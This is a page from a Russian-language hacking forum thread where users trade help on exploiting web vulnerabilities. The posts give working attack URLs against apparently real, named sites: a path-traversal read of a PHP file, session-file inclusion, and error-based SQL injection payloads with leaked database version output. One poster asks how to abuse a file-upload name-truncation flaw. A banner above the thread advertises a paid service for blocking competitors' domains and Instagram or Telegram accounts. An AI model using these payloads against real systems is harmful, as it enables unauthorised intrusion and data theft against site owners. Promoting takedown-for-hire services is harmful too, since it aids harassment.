УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 226 из 296

226

Опции темы

Поиск в этой теме

Опции просмотра

#2251

14.02.2018, 15:55

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от z3u5

z3u5 said:
↑
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?

С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

Код:

Code:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg

Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.

#2252

14.02.2018, 16:17

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от crlf

crlf said:
↑
Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

Либо прочитать любой PHP скрипт

Код:

Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../index.php

#2253

14.02.2018, 16:35

z3u5

Guest

Сообщений: n/a

Провел на форуме:
4001

Репутация: 0

Цитата:

Сообщение от crlf

crlf said:
↑
С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

Код:

Code:
Content-Disposition: inline; filename=""
Content-Length: 0
Connection: close
Content-Type: image/jpeg

Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.
Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.

Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?

#2254

14.02.2018, 16:43

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от z3u5

z3u5 said:
↑
Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?

Для этого

1) должен быть инклуд

2) не должно быть расширение(или его можно откинуть)

3) должен знать имя своего сеансового файла

site.ru/?page=../../../../../../var/log/sess_file

__________________________________________________ __________________________

.SpoilerTarget" type="button">Spoiler
https://rdot.org/forum/showthread.php?t=343

https://xakep.ru/2012/01/25/58183/

https://rdot.org/forum/showthread.php?t=1134

#2255

14.02.2018, 16:45

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Сегодня день инклудов В этом посте есть ссылка, на хороший материал.

#2256

16.02.2018, 21:34

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Цитата:

Сообщение от Octavian

Octavian said:
↑
Есть тут Sql Injection или просто ошибка? UPD: Она тут есть но не могу найти вектор

Код:

Code:
https://ums.usmf.md/hr/logAction.php/1'

Error-Based вектор, фильтруется запятая.

#2257

16.02.2018, 21:40

erwerr2321

Guest

Сообщений: n/a

Провел на форуме:
759330

Репутация: 147

Код:

Code:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5-- -

#2258

16.02.2018, 21:43

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Цитата:

Сообщение от Octavian

Octavian said:
↑
Как обойти?

JOIN.

Цитата:

Сообщение от ms13

ms13 said:
↑

Код:

Code:
https://ums.usmf.md/hr/logAction.php/Z' or substring(@@version from 1 for 1)=5

Ну, как вариант, если интересно слепые крутить.

#2259

16.02.2018, 21:47

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от Octavian

Octavian said:
↑
Как обойти?

Код:

Code:
1 https://ums.usmf.md/hr/logAction.php/Z'=0 group by mid(@@version from floor(rand(0)*2))having avg(0)-- -
2 https://ums.usmf.md/hr/logAction.php/Z'--~(select*from(select@@version)f)-- -

1. Duplicate entry '5.6.28' for key 'group_key'

2. BIGINT value is out of range in '-(~((select '5.6.28' from dual)))'

#2260

19.02.2018, 22:44

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Есть сайт загружает

Код:

Code:
6621519064845-asd.php.jpg

загрузил длинное название с расчетом на обрез

Код:

Code:
6621519064845-(около 200 символов).php.jpg

в результате получил что ожидал

Код:

Code:
6621519064845-(около 200 символов).php

но увы при запись в бд обрезается но на сервере сохраняет оригинал

Код:

Code:
6621519064845-(около 200 символов).php.jpg

Вопрос какое название носят такие уязвимость, и какие фичи эксплуатации можно попробовать? По длине php никак не обрежет ?

Страница 226 из 296

226

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход